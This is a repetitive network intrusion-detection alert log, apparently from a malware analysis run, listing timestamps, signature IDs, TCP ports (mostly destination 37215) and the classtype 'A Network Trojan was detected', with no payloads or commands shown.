              Timestamp:06/13/24-21:33:13.229512
              SID:2829579
              Source Port:35032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.606386
              SID:2829579
              Source Port:35848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544391
              SID:2835222
              Source Port:55546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609950
              SID:2829579
              Source Port:50832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676065
              SID:2829579
              Source Port:49332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043762
              SID:2835222
              Source Port:49308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123344
              SID:2829579
              Source Port:59378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057700
              SID:2835222
              Source Port:47044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805739
              SID:2829579
              Source Port:45644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.341060
              SID:2829579
              Source Port:39062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551720
              SID:2829579
              Source Port:48826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309768
              SID:2835222
              Source Port:51668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.937764
              SID:2829579
              Source Port:43286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273921
              SID:2835222
              Source Port:59266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092881
              SID:2829579
              Source Port:45614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322088
              SID:2835222
              Source Port:44304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787667
              SID:2835222
              Source Port:51930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373473
              SID:2829579
              Source Port:52524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168696
              SID:2829579
              Source Port:48966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568782
              SID:2835222
              Source Port:47478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153259
              SID:2835222
              Source Port:42108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191099
              SID:2829579
              Source Port:53110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.154842
              SID:2835222
              Source Port:48168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257971
              SID:2835222
              Source Port:56560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373919
              SID:2829579
              Source Port:43860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253040
              SID:2835222
              Source Port:48766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307917
              SID:2835222
              Source Port:54806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421291
              SID:2829579
              Source Port:37854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130412
              SID:2835222
              Source Port:46430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503256
              SID:2835222
              Source Port:43600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160337
              SID:2829579
              Source Port:41750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569681
              SID:2829579
              Source Port:59158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048560
              SID:2835222
              Source Port:37462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680290
              SID:2829579
              Source Port:52994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.304309
              SID:2829579
              Source Port:40554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376391
              SID:2829579
              Source Port:39174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672413
              SID:2829579
              Source Port:57540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275504
              SID:2835222
              Source Port:52600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110574
              SID:2835222
              Source Port:41206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670732
              SID:2835222
              Source Port:42568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176366
              SID:2829579
              Source Port:50210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353315
              SID:2829579
              Source Port:58330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.173929
              SID:2835222
              Source Port:34934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379465
              SID:2829579
              Source Port:51708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.172660
              SID:2829579
              Source Port:53984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408377
              SID:2835222
              Source Port:50582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.309947
              SID:2835222
              Source Port:55508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320272
              SID:2835222
              Source Port:43344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555944
              SID:2829579
              Source Port:36032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266476
              SID:2835222
              Source Port:33772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108959
              SID:2829579
              Source Port:33218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157851
              SID:2829579
              Source Port:49776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.930321
              SID:2829579
              Source Port:43308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093255
              SID:2835222
              Source Port:47840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728346
              SID:2835222
              Source Port:60870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227792
              SID:2829579
              Source Port:39304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153099
              SID:2835222
              Source Port:39138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127874
              SID:2835222
              Source Port:33366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401983
              SID:2829579
              Source Port:60274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803198
              SID:2829579
              Source Port:47552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569334
              SID:2835222
              Source Port:55956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422430
              SID:2835222
              Source Port:47642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271190
              SID:2835222
              Source Port:60086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176092
              SID:2835222
              Source Port:43622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553558
              SID:2835222
              Source Port:46186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.198381
              SID:2835222
              Source Port:54824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108057
              SID:2829579
              Source Port:58270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454468
              SID:2835222
              Source Port:43272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131294
              SID:2835222
              Source Port:46288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300443
              SID:2835222
              Source Port:52748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.046184
              SID:2835222
              Source Port:51544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.094255
              SID:2835222
              Source Port:58452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941078
              SID:2835222
              Source Port:41094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610123
              SID:2835222
              Source Port:41170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871560
              SID:2835222
              Source Port:54368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914322
              SID:2835222
              Source Port:34332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.526312
              SID:2835222
              Source Port:49640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992833
              SID:2829579
              Source Port:48066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262682
              SID:2835222
              Source Port:36544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092722
              SID:2835222
              Source Port:41936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077850
              SID:2829579
              Source Port:55408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823507
              SID:2835222
              Source Port:48128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669401
              SID:2829579
              Source Port:39916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127869
              SID:2835222
              Source Port:55874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157349
              SID:2835222
              Source Port:59636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804902
              SID:2829579
              Source Port:60808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.971960
              SID:2835222
              Source Port:53942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552986
              SID:2829579
              Source Port:55280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872464
              SID:2829579
              Source Port:56568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359895
              SID:2829579
              Source Port:60036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670621
              SID:2835222
              Source Port:33004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194830
              SID:2829579
              Source Port:54808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.783823
              SID:2829579
              Source Port:38224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258930
              SID:2835222
              Source Port:59494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210379
              SID:2835222
              Source Port:42530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124340
              SID:2835222
              Source Port:32908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317886
              SID:2829579
              Source Port:56748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.753412
              SID:2835222
              Source Port:37468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088728
              SID:2829579
              Source Port:52952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028014
              SID:2829579
              Source Port:59448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.239972
              SID:2829579
              Source Port:42238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042942
              SID:2829579
              Source Port:47374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310565
              SID:2829579
              Source Port:55506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405015
              SID:2835222
              Source Port:57372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613615
              SID:2829579
              Source Port:37060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323170
              SID:2829579
              Source Port:57398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195820
              SID:2835222
              Source Port:59942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088316
              SID:2829579
              Source Port:33766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911539
              SID:2829579
              Source Port:40052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554925
              SID:2835222
              Source Port:41386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176617
              SID:2829579
              Source Port:36964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632551
              SID:2835222
              Source Port:52996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.340422
              SID:2835222
              Source Port:36180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028631
              SID:2829579
              Source Port:52510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554450
              SID:2829579
              Source Port:41216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174711
              SID:2835222
              Source Port:51092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555155
              SID:2835222
              Source Port:56110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056888
              SID:2829579
              Source Port:54102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048209
              SID:2829579
              Source Port:52166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527480
              SID:2829579
              Source Port:52418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730466
              SID:2835222
              Source Port:41042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524689
              SID:2829579
              Source Port:59480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350608
              SID:2829579
              Source Port:59042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197767
              SID:2835222
              Source Port:59892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885786
              SID:2829579
              Source Port:38724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079616
              SID:2835222
              Source Port:37830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.787702
              SID:2829579
              Source Port:32914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836690
              SID:2829579
              Source Port:49838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711772
              SID:2829579
              Source Port:42434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503823
              SID:2835222
              Source Port:38826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026050
              SID:2835222
              Source Port:42280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941203
              SID:2829579
              Source Port:34544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300693
              SID:2835222
              Source Port:53062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354056
              SID:2835222
              Source Port:60692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278583
              SID:2829579
              Source Port:59022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243960
              SID:2829579
              Source Port:46926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476571
              SID:2835222
              Source Port:40904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488018
              SID:2835222
              Source Port:43694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.935597
              SID:2835222
              Source Port:33934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729011
              SID:2835222
              Source Port:56312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.504193
              SID:2829579
              Source Port:33340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914132
              SID:2829579
              Source Port:37294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751332
              SID:2835222
              Source Port:37910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420279
              SID:2835222
              Source Port:37630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175803
              SID:2835222
              Source Port:43852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247295
              SID:2829579
              Source Port:37530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176679
              SID:2829579
              Source Port:58746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085208
              SID:2835222
              Source Port:51824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376360
              SID:2835222
              Source Port:60042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509839
              SID:2835222
              Source Port:59170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400722
              SID:2829579
              Source Port:55608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569313
              SID:2829579
              Source Port:41814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730502
              SID:2835222
              Source Port:55320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216179
              SID:2835222
              Source Port:53858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404263
              SID:2829579
              Source Port:58564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322129
              SID:2835222
              Source Port:57912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567381
              SID:2835222
              Source Port:37390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416094
              SID:2829579
              Source Port:52654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096062
              SID:2829579
              Source Port:43346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353161
              SID:2835222
              Source Port:54372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572882
              SID:2829579
              Source Port:37274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710604
              SID:2835222
              Source Port:42986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.840063
              SID:2829579
              Source Port:44492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231105
              SID:2829579
              Source Port:53094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572494
              SID:2829579
              Source Port:59212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.774416
              SID:2840516
              Source Port:4554
              Destination Port:41110
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708154
              SID:2835222
              Source Port:59802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213534
              SID:2835222
              Source Port:36006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213899
              SID:2835222
              Source Port:58158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694908
              SID:2829579
              Source Port:43034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973929
              SID:2829579
              Source Port:58118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488076
              SID:2835222
              Source Port:59562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832462
              SID:2829579
              Source Port:53208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403687
              SID:2829579
              Source Port:58202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543663
              SID:2829579
              Source Port:50388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424674
              SID:2835222
              Source Port:54570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914476
              SID:2835222
              Source Port:53052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415465
              SID:2829579
              Source Port:48198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566369
              SID:2835222
              Source Port:60642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028887
              SID:2829579
              Source Port:58042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026455
              SID:2829579
              Source Port:50840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421877
              SID:2835222
              Source Port:60122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.225114
              SID:2829579
              Source Port:50056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126859
              SID:2829579
              Source Port:39928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547328
              SID:2829579
              Source Port:42580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100910
              SID:2835222
              Source Port:43496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454070
              SID:2829579
              Source Port:58096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301782
              SID:2835222
              Source Port:35440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322596
              SID:2829579
              Source Port:36060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.455078
              SID:2829579
              Source Port:45358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.671676
              SID:2835222
              Source Port:51906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867468
              SID:2835222
              Source Port:39996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486818
              SID:2835222
              Source Port:39566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216397
              SID:2835222
              Source Port:41704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359492
              SID:2829579
              Source Port:49372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756208
              SID:2829579
              Source Port:49494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420847
              SID:2829579
              Source Port:41360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279433
